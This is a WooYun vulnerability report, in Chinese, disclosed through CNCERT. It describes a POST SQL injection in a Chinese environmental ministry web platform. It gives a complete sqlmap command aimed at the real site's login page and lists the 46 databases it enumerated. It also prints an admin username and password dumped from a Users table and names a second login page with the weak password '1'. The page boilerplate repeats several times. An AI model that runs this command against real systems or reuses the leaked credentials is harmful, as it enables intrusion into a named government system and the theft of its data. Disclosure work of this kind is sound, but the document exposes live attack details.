环保部某平台POST注入可脱库 | wooyun-2014-076645| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076645

漏洞标题：环保部某平台POST注入可脱库

漏洞作者： JulyTornado

提交时间：2014-09-21 20:57

修复时间：2014-11-05 20:58

公开时间：2014-11-05 20:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-09-21：细节已通知厂商并且等待厂商处理中
2014-09-26：厂商已经确认，细节仅向厂商公开
2014-10-06：细节向核心白帽子及相关领域专家公开
2014-10-16：细节向普通白帽子公开
2014-10-26：细节向实习白帽子公开
2014-11-05：细节向公众公开

简要描述：

环保部某平台POST注入可脱库，外加一个弱口令。。。

详细说明：

post注入：

root@kali:~# sqlmap -u "http://www.envsc.cn/applyonline/login/Index.aspx" --data="__VIEWSTATE=%2FwEPDwUKMTYxNjg1MDU5OA9kFgICBQ8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCFjIwMTQwOTEwMTcyNTQ0OTM4OC5kb2NY6LCD5pW05o6S5rGh6LS55b6B5pS25qCH5YeG5Z%2B56K6t54%2Bt5YiG57uE5ZCN5Y2VLeaKpeWQjeaXtuivt%2BaMieWIhue7hOWQjeWNlei%2Fm%2BihjOaKpeWQjWRkbTCrOoTVmjtAEpSRpKg%2FdZrPTRo%3D&__EVENTVALIDATION=%2FwEWAwLp8MLLBgK97eLVCQLhmrXHBUaK0YC%2Bl6YA2qdDOSHDxkzQEIJH&KeyWord=123&BtnDo=" -p "KeyWord" --is-dba

泄露大量数据：

available databases [46]:
[*] 2013年数据传输有效率考核基数确认库
[*] apply
[*] ApplyDataBase
[*] ApplyTestDB
[*] auto
[*] AutomonitorDCDB
[*] BaseDatabaseDBFX
[*] BaseDatabaseDBliaoning
[*] BSGGPTTEST
[*] BulletinFile
[*] ControlPSListSewageTreatmentPlantDB
[*] DataAnasysDBFirstQuarter_yhf
[*] DataAnasysDBSecondQuarter
[*] DataAnasysDBThirdQuarter
[*] ddpttest
[*] EnvbbsDB
[*] EnvironmentDB
[*] envsc
[*] EnvscHBZWDB
[*] googleDB
[*] IndexTestDB
[*] MaintenanceDB
[*] master
[*] model
[*] msdb
[*] PCDB20140415
[*] PCDBTest
[*] PwfCollectionDB
[*] pwsf30
[*] PWSFTESTDB
[*] PWSFWebSiteDB
[*] QuaterFour
[*] QuaterOne
[*] QuaterThree
[*] QuaterTwo
[*] RelationDataDB
[*] ReportServer
[*] ReportServerTempDB
[*] SBaseDataDB
[*] SchedulingDB
[*] SourceProgramUserManageDB
[*] student
[*] StudentTXHDB
[*] StudentTXLDB
[*] tempdb
[*] Valid
Database: EnvironmentDB
[14 tables]
+------------------------------+
| Article                      |
| ArticleComment               |
| ArticleRelation              |
| OqListInfo                   |
| OqListOhterInfo              |
| OqRemarkTable                |
| PictureComment               |
| ProductInfo                  |
| ProductOtherInfo             |
| Salutatory                   |
| Users                        |
| ViewGetAllEnvEquipmentList   |
| ViewGetDepartmentNameChanged |
| ViewGetEnvEquipmentList      |
+------------------------------+
Database: EnvironmentDB
Table: Users
[1 entry]
+----+----------+----------+
| ID | UserName | PassWord |
+----+----------+----------+
| 1  | envadmin | 123456   |
+----+----------+----------+

附赠一个弱密码：
http://www.envsc.cn/schedulingplatform/PlatformLogin/login.html
密码为1

漏洞证明：

修复方案：

过滤，改密码。。。

版权声明：转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2014-09-26 10:04

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076645

漏洞标题：环保部某平台POST注入可脱库

相关厂商：cncert国家互联网应急中心

漏洞作者： JulyTornado

提交时间：2014-09-21 20:57

修复时间：2014-11-05 20:58

公开时间：2014-11-05 20:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-076645

漏洞标题：环保部某平台POST注入可脱库

相关厂商：cncert国家互联网应急中心

漏洞作者： JulyTornado

提交时间：2014-09-21 20:57

修复时间：2014-11-05 20:58

公开时间：2014-11-05 20:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-076645"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 JulyTornado@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：